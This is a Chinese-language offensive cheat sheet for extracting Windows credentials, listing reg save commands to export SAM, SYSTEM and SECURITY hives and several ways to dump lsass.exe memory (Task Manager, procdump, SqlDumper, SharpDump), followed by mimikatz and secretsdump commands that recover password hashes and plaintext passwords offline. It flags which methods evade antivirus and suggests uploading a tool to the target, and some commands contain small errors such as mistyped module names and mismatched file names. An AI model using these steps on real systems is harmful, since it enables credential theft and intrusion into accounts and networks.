1. minikatz抓取(在线与离线)需要高权限

离线模式:

(1)minikatz:

    1. 通过注册表导出凭证文件(目标机器)
      1. reg save HKLM\SYSTEM SystemBkup.hiv
      2. reg save HKLM\SAM SamBkup.hiv
    1. 把抓取到的凭证文件下载到本地,在本地使用minikatz破解
      1. lsadump::sam /system:SystemBkup.hiv /system:SamBkup.hiv

注:当操作系统是win8.1或者2012R2以上的时候无法抓取到明文密码,需要修改注册表

(2)secretsdump:

    1. 通过注册表导出凭证文件(目标机器)
      1. cd %temp% //进入临时文件目录
      2. reg save HKLM\SYSTEM Sys.hiv
      3. reg save HKLM\SAM Sam.hiv
      4. reg save HKLM\security security.hiv
    1. 把抓取到的凭证文件下载到本地,在本地使用secretsdump.exe破解
      secretsdump.exe -sam Sam.hiv -security security.hiv -system Sys.hiv LOCAL

(3)minikatz内部转储(离线模式,可过杀软)

    1. 在任务管理器中找到lsass.exe,右键创建转储文件
    1. 把抓取到的凭证文件下载到本地,在本地使用minikatz破解
      minikatz.exe “sekurlsa::minidump lsass.dum” “sekurlsa::logonPasswords full” exit

(4)Procdump(目前已被杀软标记)

    1. procdump导出凭证文件(目标机器)
      procdump64.exe -accepteula -ma lsass.exe lsass.dmp
    1. 把抓取到的凭证文件下载到本地,在本地使用minikatz破解
      minikatz# sekurlsa::minidump lsass.dum
      minikatz# sekurlsa::logonPasswords full

2. SqlDumper(离线模式,可过绝大部分杀软)

sqldumper.exe 微软实用调试程序

默认存放路径:

盘符:\Program Files\Microsoft SQL Server\版本号\Shared

使用方法:

  1. 查询lsass.exe进程PID
    tasklist /svc | findstr lsass.exe

  2. 导出dump文件
    方法一:Sqldumper.exe PID 0 0X01100 #导出dump文件到当前目录(必须有可读写权限)
    方法二:Sqldumper.exe PID 0 0X01100 0 C:\Users\…. #导出到指定目录

  3. 下载dump文件到本地,使用minikatz加载dump文件
    minikatz.exe “sekurlsa::mindump SQLDmpr0001.mdmp” “sekurlsa::logonPasswords full” “exit” >> info.txt

注:如果目标机器上没有sqldumper.exe,可以自己上传一个

3. SharpDump(离线,过大部分杀软)

  1. 直接运行sharpdump.exe,转储lsass.exe进程

  2. 下载C:\Windows\Temp\debug.gz

  3. 利用minikatz提取凭证
    minikatz.exe “sekurlsa::minidump debug.out” “sekurlsa::logonPasswords full”